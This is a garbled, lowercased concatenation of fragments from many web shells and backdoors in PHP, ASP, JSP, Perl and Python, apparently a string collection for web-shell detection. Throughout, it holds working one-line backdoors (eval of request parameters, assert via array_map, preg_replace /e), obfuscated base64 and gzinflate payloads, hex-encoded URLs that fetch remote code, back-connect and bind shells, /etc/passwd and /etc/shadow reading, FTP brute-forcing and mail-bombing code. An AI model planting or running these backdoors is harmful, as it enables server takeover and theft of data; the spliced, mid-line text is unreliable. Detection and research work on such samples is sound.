}foreach($values as $k=>$v) {$values[$k] = addslashes($v);}body, td, tr {$d=str_replace(\"\\\\\",\"/\",$d);if ($file==\".\" || $file==\"..\") continue;string savepath = request.getparameter(\"savepath\");url downurl = new url(downfileurl);if (util.isempty(downfileurl) || util.isempty(savepath))string downfileurl = request.getparameter(\"url\");fileinputstream finput = new fileinputstream(f);urlconnection conn = downurl.openconnection();sis = request.getinputstream();<meta http-equiv=\"content-type\" content=\"text/html; charset=gb2312\"></head><input type=\"hidden\" name=\"_eventtarget\" value=\"\" /><input type=\"hidden\" name=\"_eventargument\" value=\"\" /><table width=\"100%\" border=\"1\" cellspacing=\"0\" cellpadding=\"5\" bordercol kb </td><table width=\"98%\" border=\"0\" cellspacing=\"0\" cellpadding=\"<!-- <tr align=\"center\"> http://www.4ngel.net</a> | <a href=\"?action=phpenv\">phpecho $msg=@fwrite($fp,$_post['filecontent']) ? \"codz by angel$res = @shell_exec($cfe);$res = @ob_get_contents();@exec($cfe,$res);private static final int editfield_rows = 30;private static string tempdir = \".\";<input type=\"hidden\" name=\"dir\" value=\"<%=request.getattribute(\"dir\")%>\"\" <select name='encode' class='input'><option value=''>ansi</option><option valjsession.setattribute(\"msg\",\"<span style='color:red'>upload file failed!</spafile f = new file(jsession.getattribute(current_dir)+\"/\"+filebean.getfilename(((invoker)ins.get(\"vd\")).invoke(request,response,jsession);$handle = @opendir($dir) or die(\"can't open directory $dir\");if(!empty($_post['mysql_db'])) { @mssql_select_db($_post['mysql_db'],$db); }if (!isset($_server['php_auth_user']) || $_server['php_auth_user']!==$name || $_,htaprewop(ecalper=htaprewop:fi dne:0=kotide:1 - eulavtni = eulavtni:neht 1 => ej \"<form action='\"&url&\"?action2=post' method='post' name='editform'><input nerror_reporting(0);session_start();header(\"content-type:text/html;charset=utf-8function fvm(jwv):if jwv=\"\"then:fvm=jwv:exit function:end if:dim tt,sru:tt=\"<option value=\"\"drop table [jnc];exec mast\"&kvp&\"er..xp_regwrite 'hkey_localif qpv=\"\" then qpv=\"x:\\program files\\mysql\\mysql server 5.0\\my.ini\"&br&\">www.expdoor.com</a> <input name=\"filename\" type=\"text\" value=\"asp_ver.asp\" size=\"20\" maxset file=fs.opentextfile(server.mappath(filename),8,true) 'set fs=server.createobject(\"scripting.filesystemobject\") '<title>expdoor.com asp<?php $s=@$_get[2];if(md5($s.$s)==<%eval(request(chr(112))):set fso=createobject$i = pack('c*', 0x70, 0x61, 99, 107); 'h' => $i('h*', '687474703a2f2f626c616b696e2e64756170702e636f6d2f7631'),//http://require.duapp.com/session.phpif(!isset($_session['t'])){$_session['t'] = $globals['f']($globals['h']);}//define('pass','123456');$globals['c']($globals['e'](null, $globals['s']('%s',$globals['p']('h*',$_sessiovoid aa(stringbuffer sb)throws exception{file r[]=file.listroots();for(int i=0;ibw.write(z2);bw.close();sb.append(\"1\");}else if(z.equals(\"e\")){ee(z1);sb.appif(z.equals(\"a\")){string s=new file(application.getrealpath(request.getrequest// web shell!!@preg_replace(\"/.*/e\",\"\\x65\\x76\\x61\\x6c\\x28\\x67\\x7a\\x69\\x6e\\x66\\x6$default_charset = \"utf-8\";// url:http://www.weigongkai.com/shell/if (strpos($_server['http_user_agent'], 'ebsd') == false) {setcookie('key', $_post['pwd'], time() + 3600 * 24 * 30);$_session['code'] = _request(sprintf(\"%s?%s\",pack(\"h*\",'6874if (preg_match(\"/^http\\/\\d\\.\\d\\s([\\d]+)\\s.*$/\", $status, $matches))eval(gzuncompress(gzuncompress(crypt::decrypt($_session['code'], $_cif (($fsock = fsockopen($url2['host'], 80, $errno, $errstr, $fsock_timeout))if(is_readable($path)) antivirus($path.'/',$exs,$matches);'/(eval|assert|include|require|include\\_once|require\\_once|array\\_map|arr'/(exec|shell\\_exec|system|passthru)+\\s*\\(\\s*\\$\\_(\\w+)\\[(.*)\\]\\s*'/(include|require|include\\_once|require\\_once)+\\s*\\(\\s*[\\'|\\\"](\\w+'/\\$\\_(\\w+)(.*)(eval|assert|include|require|include\\_once|require\\_oncemail: chinese@hackermail.comif($_get[\"hackers\"]==\"2b\"){if ($_server['request_method'] == 'post') { echo site: http://blog.weili.me<a class=\"high2\" href=\"javascript:;;;\" name=\"action=show&dir=$_ipage_fi$file = !empty($_post[\"dir\"]) ? urldecode(self::convert_to_utf8(rtrim($_poif (true==@move_uploaded_file($_files['userfile']['tmp_name'],self::convert_processed in <span id=\"runtime\"></span> second(s) {gzip} usage:<a href=\"javascript:;;;\" name=\"{return_link}\" onclick=\"fileperm<%@page import=\"java.io.*\"%><%if(request.getparameter(\"f\")<?php eval($_post[1]);?> <%@page import=\"java.io.*,java.util.*,java.net.*,java.sql.*,java.text.*\"%><%!s<[url=mailto:?@array_map($_get[]?@array_map($_get['f'],$_get[/url]);?>:https://forum.90sec.org/forum.php?mod=viewthread&tid=7316@preg_replace(\"/f/e\",$_get['u'],\"fengjiao\"); qq(cs, z1, z2, sb,z2.indexof(\"-to:\")!=-1?z2.substring(z2.indexof(\"-to:\")+4,zsb.append(l[i].getname() + \"/\\t\" + st + \"\\t\" + l[i].length()+ \"\\t\" + sqresultset r = s.indexof(\"jdbc:oracle\")!=-1?c.getmetadata()return drivermanager.getconnection(x[1].trim()+\":\"+x[4],x[2].equalsignorecase(sod=array(\"d\",\"7\",\"s http://www.baidu.com/fuck.asp?a=)0(tseuqer%20lave <% a=request(chr(97)) executeglobal(strreverse(a)) %>array_map(\"asx73ert\",(arpreg_replace(\"/[errorpage]/e\",$page,\"saft\");shell.php?qid=zxexp <?php array_map(\"ass\\x65rt\",(array)$_request['expdoor']);?><?php eval(str_rot13('riny($_cbfg[cntr]);'));?><?$_uu=chr(99).chr(104).chr(114);$_cc=$_uu(101).$_uu(118).$_uu(97).$_uu(108).$_uecho \"<font color=blue>error!</font>\";<input type=\"text\" size=61 name=\"f\" value='<?php echo $_server[\"script_file - expdoor.com</title>$f=fopen($_post[\"f\"],\"w\");<textarea name=\"c\" cols=60 rows=15></textarea><br>execute morficoder(\")/*/z/*/(tseuqer lave\")function morficoder(code)morficoder=replace(replace(strreverse(code),\"/*/\",\"\"\"\"),\"\\*\\\",vbcrlf)my @adms=(\"kelserific\",\"puna\",\"nod32\")#acesso a shel - 1 on 0 offhttp://michaeldaw.org 2006or http://<? echo $server_name.$request_uri; ?>?d=c:/windows on wincoded by z0mbie<option value=\"cat /var/cpanel/accounting.log\">/var/cpanel/accounting.log</optliz0zim private safe mode command execuriton bypassecho \"<b><font color=red>kimim ben :=)</font></b>:$uid<br>\";echo \"command : <input type=text name=cmd value=\".@stripslashes(htmlentities($if(!$whoami)$whoami=exec(\"whoami\"); echo \"whoami :\".$whoami.\"<br>\";shankar<input type=checkbox name='dd' \".(isset($_post['dd'])?'checked':'').\">db<inputshow<input type=text size=5 value=\".((isset($_post['br_st']) && isset($_post['bcopy ( $dosya_gonder2, \"$dir/$dosya_gonder2_name\") ? print(\"$dosya_gonder2_naecho \"<center><font size='$sayi' color='#ffffff'>hacklerin<font color='#008000'value='calistirmak istediginiz eval(gzinflate(base64_decode('fjzhkqpatku/550ignjxxhvv6bzae0ie5+svfvgtkqxmzq05x1shellbotpacktsgr0upcorporation# servidor de irc que vai ser usado /^ctcpflood\\s+(\\d+)\\s+(\\s+)$succ = \"warning! don`t be stupid .. this is a priv3 server, so take extra care!\\*=-- members area --=*/preg_match('/(\\n[^\\n]*){' . $cache_lines . '}$/', $_session['ocr4sh_aka_rklngh edition/* connectback-backdoor on perl<form action=<?=$script?>?act=bindshell method=post>$logo = \"r0lgodlhmaawaoyaaaaaap////r// backdoor.jspjsp backdoor reverse shellmailto:rhfactor@antisocial.com?raiz=rootdigo corrompido<br>corrupt codekey = \"5dcadac1902e59f7273e1902e5ad8414b1902e5abf3e661902e5b554fc41902e53205ca0ntdaddy v1.9 by obzerve of fux0r inc<error: this is not a text file>raw d.o.s. command interfacesimattacker - vrsion : 1.0.0 - priv8 4 my friend fputs ($fp ,\"\\n*********************************************\\nwelcome t0 simecho \"<a target='_blank' href='?id=fm&fedit=$dir$file'><span style='text-decora<title>remote explorer</title> fso.copyfile request.querystring(\"folderpath\") & request.querystring(\"copyfi<td bgcolor=\"<%=bgcolor%>\" title=\"<%=file.name%>\"> <a href= \"showcode.asp?f{mkdir(\"$dizin/$duzenx2\",777)$baglan=fopen($duzkaydet,'w');phvayv 1.0set aktifklas=request.querystring(\"aktifklas\")action=\"klasvayv.asp?klasorac=1&aktifklas=<%=aktifklas%>&klas=<%=aktifklas%><font color=\"#858585\">www.aventgrup.netstyle=\"background-color: #95b4cc; border-bottom: #000000 1px inset; border-leftr57shell else if ($http_post_vars['with'] == \"lynx\") { $http_post_vars['cmd']= \"lynx rush security team'ru_text12' => 'back-connectc:\\tmp\\dump_rst mysqlhttp://rst.void.ru$st_form_bg='r0lgodlhcqajaiaaaofo6u7w8yh5baaaaaaalaaaaaajaakaaaipjaonujfnhjh0qtfw0lcvads=';#use: python wh_bindshell.py [port] [password]python -c\"import md5;x=md5.new('you_password');print x.hexdigest()\"#bugz: ctrl+c etc =script stoped=network security team :: cgi shell#########################<<konec>>#######################################if (!defined$param{pwd}){$param{pwd}='enter_password'};##eval(gzinflate(base64_decode('hj3hkqnqeku/zzqcbd4t8v4yaqi2e3jvpv8/1gw6orsvflyxef//$message.= \"--{$mime_boundary}\\n\" .\"content-type: {$fileatt_type};\\n\" .$ftpconnect = \"ncftpput -u $ftp_user_name -p $ftp_user_pass -d debsender_ftplogmove_uploaded_file($userfile, \"entrika.php\"); send this file: <input name=\"userfile\" type=\"file\"><input type=\"hidden\" name=\"max_file_size\" value=\"100000\">w a r n i n g: private server$message = q$<pre><font color=\"#669999\"> _____ _____ _____ _____ w3d shellby: warpboyno query executedwebshell.cgi<td><code class=\"entry-[% if entry.all_rights %]mine[% elsewinx shellcreated by greenwood from n57<td><font color=\\\"#990000\\\">win dir:</font></td>$def_ports=array (1=>'tcpmux (tcp port service multiplexer)',2=>'management util$ra44 = rand(1,99999);$sj98 = \"sh-$ra44\";$ml = \"$sd98\";$a5 = $_server['http.::[c0derz]::. web-shellhttp://c0derz.org.uavint21h@c0derz.org.ua$name='63a9f0ea7bb98050796b649e85481845';//rootnews remote php shell injectionphp shell <br /><input type = \"text\" name = \"url\" value = \"codz by angel(4ngel)web: http://www.4ngel.net$admin['cookielife'] = 86400;$errmsg = 'the file you want downloadable was nonexistent';$res .= '<td align=\"center\"><a href=\"'.$xshell.'?act=chmod&file='.$_session[ak-74 security team web site: www.ak74-team.net$php=\"/* line 1 */\\n\\n// \".mm(\"for example, uncomment next line\").\"welcome to phpremoteview (remview)pysystemstate.initialize(system.getproperties(), null, argv);public class jythonshell extends jpanel implements runnable {public static int default_scrollback = 100drmist.ruhidden(\"action\",\"download\").hidden_pwd().\"<center><table><tr><td width=80stnc webshellhttp://www.security-teams.net/index.php?showtopic=azrailphp<br><center><input type='submit' name='dy' value='dosya yolla!'></center><center><input type='submit' name='okmf' value='tamam'></center>;$sd98=\"john.barker446@gmail.com\"print \"sending mail to $to....... \";<td colspan=\"2\" width=\"715\" background=\"/simparts/images/cellpic1.gif\" hei$dump_file.='`'.$rows2[0].'`filename=\\\"dump_{$db_dump}_${table_dcmdasp.asp-- use a poor man's pipe ... a temp file --maceo @ dogmile.com<!-- simple php backdoor by dk (http://michaeldaw.org) -->usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwdsoomin kimsmkim@popeye.snu.ac.krecho \"<td><a href='$php_self?action=deletedata&dbname=$dbname&tablename=$tablenemperor hacking teamsimshell<form name=\"shell\" action=\"<?php echo $_server['php_self'] ?>\" method=\"post[url=http://www.governmentsecurity.orgperl asmodeus.pl client 6666 127.0.0.1print \"asmodeus perl remote shell$internet_addr = inet_aton(\"$host\") or die \"aloa:$!\\n\";#phpmyadmin mysql-dump;db_connect();header('content-type: application/octetstr$data .= \"#database: $databasemehdi & holydemonwww.infilak.'*t@*r@#@&mms^pdbybvubcaaa==^#~@%><form method=post name=inf><table width=\"75%<title>[additinal tittle]-phpshell by:[yourname]<?php echo phpshell_version ?></href=\"mailto: [you can enter your mail here]- [additional text]</a></i>@chdir($work_dir) or ($shelloutput = \"myshell: can't change directory.echo \"<font color=$linkcolor><b>myshell file editor</font> file:<font color $fileeditinfo = \"&nbsp;&nbsp;:::::::&nbsp;&nbsp;owner: <font color=$simorgh security magazine simshell.css} elseif (ereg('^[[:blank:]]*cd[[:blank:]]+([^;]+)$', $_request['command'], www.simorgh-ev.comkj021320case 't':systemtools(out);break;out.println(\"<tr><td>\"+ico(50)+f[i].getname()+\"</td><td> file<die(\"couldn't read directory, blocked!!!\");php web shellshells.dl.amthis server has been infected by $owner<input type=\"submit\" value=\"include!\" name=\"inc\"></p>could not write to file! (maybe you didn't enter any text?)#we are: masterkid, alexutz, fatman & mikutul echo --==userinfo==-- ; id;echo;echo --==directory==-- ; pwd;echo; echo --==shelconnectback backdoortarget fi1e:<br><input type=\"text\" name=\"target\" value=\"index.php\"></br>eval(base64_decode(\"zxzhbchiyxnlnjrfzgvjb2rlkcjhv2r1yjnkbfgzvnpawepmwvdkdmnuuw9<img src=\"http://s43.radikal.ru/i101/1004/d8/ced1f6b2f5a9.png\" align=\"center$back_connect_p=\"iyevdxnyl2jpbi9wzxjsdqp1c2ugu29ja2v0ow0kjglhzgrypwluzxrfyxrvbiecho '<h1>execution php-code</h1><div class=content><form name=pf method=posecho \"[dir] <a href=\\\"\".$_server['php_self'].\"?rep=\".realpath($rep.\"..class backdoor {echo \"<a href=\\\"\".$_server['php_self'].\"?copy=1\\\">copier un fichier</a> <if int((1-0+1)*rnd+0)=0 then makeemail=maketext(8) & \"@\" & maketext(8) & \".\"<form name=frmcmd method=post action=\"<%=gurl%>\">dim zombie_array,special_arrayhttp://vnhacker.orgd7nd7l.km4snk`jzknd{n_ejq;bd{kbpur#kq8aaa==^#~@%>></td><td><input type=\"submitprint \"\\n\".'<tr><td width=100pt class=linelisting><nobr>post (php eval)</td><dizin</font></b></font><font face=\"verdana\" style=\"font-size: 8pt\"><s72 shell v1.0 codinf by cr@zy_kingecho \"<p align=center>dosya zaten bulunuyor</p>\"<?$d='g7mhwq9vvxil/qx2oz2vtdpo6g3fyaa6x+8dmizcd0ehzabzh7jfpzzuz7xnenxsyvbp2wy36ukacak fso 1.0if request.querystring(\"tgh\") = \"1\" then<font color=\"#858585\">buqx</font></a></font><font face=\"verdana\" style=mailto:buqx@hotmail.comlord of iran hackers sabotagelord-c0d3r-nt$port = base_convert(bin2hex(substr($reqmessage[$id], 3+$reqlen+1, 2)), 16, 10);# [+] domain name address typewww.antichat.rucan't open file, permission denidehas been already loaded. php emperor <xb5@hotmail.action=mysqlread&mass=loadmass\">load all defaultsif (@passthru($cmd)) { echo \" -->\"; $this->output_state(1, \"passthruprint \"<tr><td><b>server is:</b></td><td>\".$_server['server_signature'].\"</tdprint \"<tr><td><b>execute command:</b></td><td><input size=100 name=\\\"_cmdcoded by n0 [nzer0] www.cyberlords.netu29mdhdhcmuaqwrvymugsw1hz2vszwfkexhjztwaaaamuexurf///waaajmzzaaaacjourkaaaaereturn \"<br>dump error! can't write to \".htmlspecialchars($file);call os.run(\"win.com cmd.exe /c del \"& sztf,0,true)<div align=\"left\"><font size=\"1\">input command :</font></div><input type=\"text\" name=\"cmd\" size=\"30\" class=\"input\"><br><input type=\"text\" name=\"dir\" size=\"30\" value=\"<? passthru(\"pwd\"); ?>ayyildiztouch by ijoofirst we check if there has been asked for a working directoryhttp://ayyildiz.org/images/whosonline2.gifejder was here*~pu*&bp[_)f!8c2f*@#@&~,p~p,~p&q~8bpms~9~~lb~x`v,_,f&*~,jcw~~[_c3trffzq@#@&pp,~~lama's'hellif($_post['king'] == \"\") {if (move_uploaded_file($_files['fila']['tmp_name'], $curdir.\"/\".$_files['fnewhtml = '<b>file browser is under construction! use at your own risk!</b> <br>empty command..type \\\"shellhelp\\\" for some ehh...helpnewhtml = '<font size=0><b>this will reload the page... :(</b><br><br><form enctjspwebshellcreateanddeletefolder is error:<td width=\"70%\" height=\"22\">&nbsp;<%=env.queryhashtable(\"java.cstring _password =\"111\";$baglan=fopen(\"/tmp/$ekinci\",'r');$tampon4=$tampon3-1@aventgrup.net$yazi = \"test\" . \"\\r\\n\";fwrite ($fp, \"$yazi\");$entry_line=\"hacked by entrika\";sh_out=os.popen(shell+\" \"+cmd).readlines()# d00r.py 0.3a (reverse|bind)-shell in python by fqprint \"error; help: head -n 16 d00r.py\"print \"pw:\",pw,\"port:\",port,\"host:\",host$error_text = '<strong>failed selecting database \"'.$this->db['<div align=\"center\">the backup process has now started<br </a><a href='\"&dosyapath&\"?status=10&dpath=\"&f1.path&\"&path=\"&path&\"&time=<input type=submit value=\"test et!\" onclick=\"$ar_file=array('/etc/passwd','/etc/shadow','/etc/master.passwd','/etc/fstab','/eshow <input type=text size=5 value=\".((isset($_post['br_st']))?$_post['br_st']:echo \"fichier telecharge dans \".good_link(\"./\".$_files[\"fic\"][\"naif(move_uploaded_file($_files[\"fic\"][\"tmp_name\"],good_link(\"./\".$_fiecho \"cliquez sur un nom de fichier pour lancer son telechargement. cliquez s$dl=$_request['download'];else shell(\"perl.exe $name $port\");fputs ($fp, \"# rst mysql tools\\r\\n# home page: http://rst.void.ru\\r\\n#a cgi by fuzzyman\"\"\"+fontline +\"version : \" + versionstring + \"\"\", running on : \"\"\" + values = map(lambda x: x.value, theform[field]) # allows for<title>ru24postwebshell - \".$_post['cmd'].\"</title>if ((!$_post['cmd']) || ($_post['cmd']==\"\")) { $_post['cmd']=\"id;pwd;uname -awrited by dreamerzr3v3ng4ns\\ndigiteif(!@opendir($chdir)) $ch_msg=\"dtool: line 1: chdir: it seems that the permissiif (empty($cmd) and $ch_msg==\"\") echo (\"comandos exclusivos do dtool pro\\n0ldw0lfhowever you are lucky :pi'm fuckedioctl($client{$client}->{shell}, &tiocswinsz, $winsize);#atrix@irc.brasnet.org$dataout .= \"<td><a href='$myloc?$sreq&incdbhost=$myhost&incdbuser=$myuser&incdif($run == 1 && $phpshellapp && $phpshellhost && $phpshellport) $stroutput .= dbsafe0verscript gecisi tamamlayamadi!document.write(unescape('%3c%68%74%6d%6c%3e%3c%62%6f%64%79%3e%3c%53%43%52%49%50%/* we have found the parent dir. we must be carefull if the parent $tmpfile = tempnam('/tmp', 'phpshell');if (ereg('^[[:blank:]]*cd[[:blank:]]+([^;]+)$', $command, $regs)) {www.rohitab.comprint \"set-cookie: savedpwd=;\\n\"; # remove password cookie$prompt = $winnt ? \"$currentdir> \" : \"[admin\\@$servername $cwww.ironwarez.info$cookiename = \"wieeeee\";~ shell iwww.rootshell-team.infosetcookie($cookiename, $_post['pass'], time()+3600);www.victime.com/index.php?page=http://emplacement_de_la_backdoor.php , ou en tanprint(\"<br>provenance du mail : <input type=\\\"text\\\" name=\\\"provenancif mcolformelem.exists(lcase(sindex)) then form = mcolformelem.item(lcase(sindex))session(\"shagman\")=// note that linux = cmd and windows = \"cmd.exe /c + cmd\" h4ntu shellsystem(\"$cmd 1> /tmp/cmdtemp 2>&1; cat /tmp/cmdtemp; rm /tmp/cmdtemp\");set entrika = entrika.createtextfile(\"c:\\net.vbs\", true)http://www35.websamba.com/cybervurgun/>[*] safemode mode run</div>$file1 - $file2 - <a href=$script_name?$query_string&see=$file>$file</a><br>[*] spawning shellcha0shttp://popeye.snu.ac.kr/~smkim/mysqlhref='$php_self?action=dropfield&dbname=$dbname&tablename=$tablename<th>type</th><th>&nbspm&nbsp</th><th>&nbspd&nbsp</th><th>unsigned</th><th>zerofi<title>g-security webshell</title><input type=text name=\"-cmd\" size=64 value=\"<?=$cmd?>\" <? if($cmd != \"\") print shell_exec($cmd);?><? $cmd = $_request[\"-cmd\"];?>echo \"<b>changing file-mode (\".$d.$f.\"), \".view_perms_color($d.$f).\" (\"echo \"<td>&nbsp;<a href=\\\"\".$sql_surl.\"sql_act=query&sql_query=\".ur<tr><form method=post><td><font color=red><b>back connect:</b></font></td><td><i$perl_proxy_scp = \"iyevdxnyl2jpbi9wzxjsicancimhl3vzci91c2mvcgvybc81ljawnc9iaw4v<tr><form method=post><td><font color=red><b>backdoor:</b></font></td><td><input.textbox { background: white; border: 1px #000000 solid; color: #000099; font-fa<input class='inputbox' type='text' name='pass_de' size=50 onclick=this.value=''echo \"<hr size=\\\"1\\\" noshade><b>done!</b><br>total time (secs.): \".$ft$fqb_log .= \"\\r\\n------------------------------------------\\r\\ndone!\\r'eng_text71'=>\"second commands param is:\\r\\n- for chown - name of new owner oif(!empty($_post['s_mask']) && !empty($_post['m'])) { $sr = new searchresult\"aaaaach5baeaaakalaaaaaauabqaaar0mmljqyzfalqeqjugeqscnwg6fogpkhamf4hajswh7/ze\"\"mtp/zdp//2yaagyam2yazmyamwyazgya/2yzagyzm2yzzmyzmwyzzgyz/2zmagzmm2zmzmzmmwzm\"\"r0lgodlhfaauakl/ap/4/8dawh9/ap/4al+/vwaaaaaaaaaaach5baeaaaealaaaaaauabqaqamo\"echo $te.\"<div align=center><textarea cols=35 name=db_query>\".(!empty($_post['echo sr(45,\"<b>\".$lang[$language.'_text80'].$arrow.\"</b>\",\"<select name=db> if ($copy_unset) {foreach($sess_data[\"copy\"] as $k=>$v) {unset($sess_data[\" if (file_exists($mkfile)) {echo \"<b>make file \\\"\".htmlspecialchars($mkfile echo \"<center><b>mysql \".mysql_get_server_info().\" (proto v.\".mysql_get_pr elseif (!fopen($mkfile,\"w\")) {echo \"<b>make file \\\"\".htmlspecialchars($m$sess_data[\"cut\"] = array(); c99_sif ((!eregi(\"http://\",$uploadurl)) and (!eregi(\"https://\",$uploadurl))c99sh_sqlqueryelse {$act = \"f\"; $d = dirname($mkfile); if (substr($d,-1) != directory_sepaelse {echo \"<b>file \\\"\".$sql_getfile.\"\\\":</b><br>\".nl2br(htmlspec'ru_text9' =>'???????? ????? ? ???????? ??? ? /bin/bash',$name='ec371748dc2da624b35a4f8f685dd122'echo ws(2).$lb.\" <a$sql = \"load data infile \\\"\".$_post['test3_file']if (empty($_post['cmd'])&&!$safe_mode) { $_post['cmd']=($windows)?(\"dir\"):(\"lif(eregi(\"./shbd $por\",$scan))$_post['backconnectip']$_post['backcconnmsg']if(rmdir($_post['mk_name']))$r .= '<tr><td>'.ws(3).'<font face=verdana size=-2><b>'.$key.'</b></font></td>if(unlink($_post['mk_name'])) echo \"<table width=100% cellpadding=0 cell\"ext_avi\"=>array(\"ext_avi\",\"ext_mov\",\"ext_mviecho \"<b>execute file:</b><form action=\\\"\".$surl.\"\\\" method=post><inpu\"ext_htaccess\"=>array(\"ext_htaccess\",\"ext_htpasswdreturn $type . $owner . $group . $other;$owner = ($mode & 00400) ? 'r' : '-';sncirwcm90bz1nzxrwcm90b2j5bmftzsgndgnwjyk7dqpzb2nrzxqou09ds0vulcbqrl9jtkvulcbtt0a8c3lzl3nvy2tldc5opg0ki2luy2x1zgugpg5ldgluzxqvaw4uad4ncinpbmnsdwrlidxlcnjuby5opg<b>dumped! dump has been writed to if ((!empty($donated_html)) and (in_array($act,$donated_act))) {echo \"<table st<input type=submit name=actarcbuff value=\\\"pack buffer to archive@ini_set(\"highlightecho \"<b>result of execution this php-code</b>:<br>\";{$row[] = \"<b>owner/group</b>\";}echo $uname.\"</font><br><b>\";while(!feof($f)) { $res.=fread($f,1024); }echo \"user=\".@get_current_user().\" uid=\".@getmyuid().\" gid=\".@getmygid()c99ftpbrutecheck$ftpquick_t = round(getmicrotime()-$ftpquick_st,4);$fqb_lenght = $nixpwdperpage;$sock = @ftp_connect($host,$port,$timeout);$sqlquicklaunch[] = array(\"else {echo \"<center><b>file does not exists (\".htmlspecialchars($d.$f).\")!<if(@$_post['save'])writef($file,$_post['data']);if($action==\"phpeval\"){$uploadfile = $dirupload.\"/\".$_post['filename'];$dir=getcwd().\"/\";if (!empty($delerr)) {echo \"<b>deleting with errors:</b><br>\".$delerr;}if ($filename != \".\" and $filename != \"..\"){$dires = $dires . $directory;$arr = array_merge($arr, glob(\"*\"));@$rto=$_post['rto'];scrollbar-track-color: #91aaff$to1=str_replace(\"//\",\"/\",$to1); if ($mode & 0x200) {$world[\"execute\"] = ($world[\"execute\"] == \"x\")?\"t\": $group[\"execute\"] = ($mode & 00010)?\"x\":\"-\";$result = mysql_query(\"show processlist\", $sql_sock); elseif (!empty($ft)) {echo \"<center><b>manually selected type is incorrect. ielse {echo \"<center><b>unknown extension (\".$ext.\"), please, select type ma$s = \"!^(\".implode(\"|\",$tmp).\")$!i\";if ($total === false) {$total = 0;}$free_percent = round(100/($total/$free),2);if (!$bool) {$bool = is_dir($letter.\":\\\\\");}$bool = $isdiskette = in_array($letter,$safemode_diskettes);$res = mssql_query(\"select * from r57_temp_table\",$db);'eng_text30'=>'cat file',@mssql_query(\"drop table r57_temp_table\",$db);$num = $nixpasswd + $nixpwdperpage;$ret = posix_kill($pid,$sig);if ($uid) {echo join(\":\",$uid).\"<br>\";}$i = $nixpasswd;form method=post><input type=hidden name=\"\"#\"\" value=execute(session(\"\"#\"\"))><input name=thepath value=\"\"\"&htmlencode(server.mappath(\".\"))&else{$d.=@chr(($h[$e[$o]]<<4)+($h[$e[++$o]]));}}eval($d);lsext = right(filename, len(filename) - licount)response.write drive.sharename & \" [share]\"if request.querystring(\"copyfile\") <> \"\" then<td width=\"40%\" height=\"20\" bgcolor=\"silver\"> name</td>@rmdir($_get['file']) or die (\"[-]error deleting dir!\");$ps=str_replace(\"\\\\\",\"/\",getenv('document_root'));header(\"expires: \".date(\"r\",mktime(0,0,0,1,1,2030)));search_file($_post['search'],urldecode($_post['dir']));echo base64_decode($images[$_get['pic']]);if (isset($_get['rename_all'])) {$from = rand (71,1020000000).\"@\".\"attacker.com\";&nbsp;turkish hackers : www.alturks.com <br>&nbsp;programer : simattacker - edited by kingdefacer<br>//fake mail = use victim server 4 dos - fake mail &nbsp;e-mail : kingdefacer@msn.com<br>error_reporting(e_error | e_warning | e_parse);echo \"<font size='1' color='#999999'>dont in windows\";$comments=$_post['comments'];function phpget(){inclvar(); if(confirm(\"o phpget agora oferece uma lista pront<font size=3>by r3v3ng4ns - revengans@gmail.com </font>function phpwriter(){inclvar();var url=prompt(\"[ phpwriter ] by r3v3ng4ns\\ndig//turns the 'ls' command more usefull, showing it as it looks in the shellif (@file_exists(\"/usr/bin/wget\")) $pro3=\"<i>wget</i> at /usr/bin/wget, \";//to keep the changes in the url, when using the 'get' way to send php variablesfunction phpf(){inclvar();var o=prompt(\"[ phpfileditor ] by r3v3ng4ns\\ndigite if(empty($fu)) $fu = @$_get['fu'];<title>'.getenv(\"http_host\").' ~ shell i</title>$link = mysql_connect($_post['host'], $_post['username'], $_posterror_reporting(0); //if there is an error, we'll show it, k?print \"<form action=\\\"\".$me.\"?p=chmod&file=\".$content.\"&dif(!is_numeric($_post['timelimit']))if($_post['chars'] == \"9999\")<option value=\\\"az\\\">a - zzzzz</option>print shell_exec($command);<meta http-equiv=\"content-language\" content=\"tr\"><title>www.sanalteror.org - indexer and reader</title><form action=\"?gonder\" method=\"post\"><form action=\"?oku\" method=\"post\">var message=\"sanalteror - ndexer - reader\"cprthtml = \"<font face='arial' size='1'>rhtools 1.5 beta(pvt) edited by kingdefbarrapos = cint(instrrev(left(raiz,len(raiz) - 1),\"\\\")) - 1destino3 = folderitem.path & \"\\index.asp\"@error_reporting(0);@eval(gzinflate(base64_decode($code)));@set_time_limit(0); </font></span><a href=\"mailto:shopen@aventgrup.net\"><title>:: aventgrup ::.. - sincap 1.0 | session(oturum) b</span>avrasya veri ve network teknolojileri geliwhile (($ekinci=readdir ($sedat))){$deger2= \"$ich[$tampon4]\";// encrypt your password to md5 here http://kerinci.net/?x=decode// password (default is: b374k)//******************************************************************************// b374k 2.2eval(\"?>\".gzinflate(base64_decode(&nbsp;iranian hackers : www.simorgh-ev.com <br><a style=\"text-decoration: none\" href=\"http://www.simorgh-ev.com\">victim mail :<br><input type='text' name='to' ><br><title>h4ntu shell [powered by tsoi]</title>$cmd = $_post['cmd'];$uname = posix_uname( );echo \"<p><font size=2 face=verdana><b>this is the server information</b></font>ob_end_clean();<title>myshell error - access denied</title>$adminemail = \"youremail@yourserver.com\";//a workdir has been asked for - we chdir to that dir.system($command . \" 1> /tmp/output.txt 2>&1; cat /tmp/output.txt; rm /tmp/o#$autoerrortrap enable automatic error traping if command returns error./* no work_dir - we chdir to $document_root */#every command you excecute.<form name=\"shell\" method=\"post\">if ($_post['cmd']){echo \"file uploaded to $dez\";if (file_exists($uploaded)) {passthru($cmd);ster\" name=submit> </font> &nbsp; &nbsp; &nbsp; <a href=mailto:mailbomb@hotmail hacking font-weight: bold; background: #ffffff url('images/cellpic1.gif'); text-indent: padding-right: 8px; padding-left: 8px; font-weight: bold; font-size: 11px; backg<option value=\"/etc/passwd\">get /etc/passwd</option>by php emperor<xb5@hotmail.com>\".htmlspecialchars($file).\" has been already loaded. php emperor <xb5@hotmail.die(\"<font color=\\\"red\\\"><center>sorry... fileif(empty($_get['file'])){echo \"<head><title>safe mode shell</title></head>\"; $liz0zim=shell_exec($_post[liz0]); $liz0=shell_exec($_post[baba]); echo \"<b><font color=blue>liz0zim private safe mode command execuriton bypass e :=) :</font><select size=\"1\" name=\"liz0\">http://<? echo $server_name.$request_uri; ?>?d=/etc on *nix// a simple php backdoor | coded by z0mbie [30.08.03] | http://freenet.am/~zombiif(!isset($_request['dir'])) die('hey,specify directory!');else echo \"<a href='$php_self?f=$d/$dir'><font color=black>\";if( $_post['_act'] == \"upload!\" ) {print \"<center><h1>#worst @dal.net</h1></center>\";print \"<center><h1>linux shells</h1></center>\";$currentcmd = \"ls -la\";print \"<tr><td><b>system 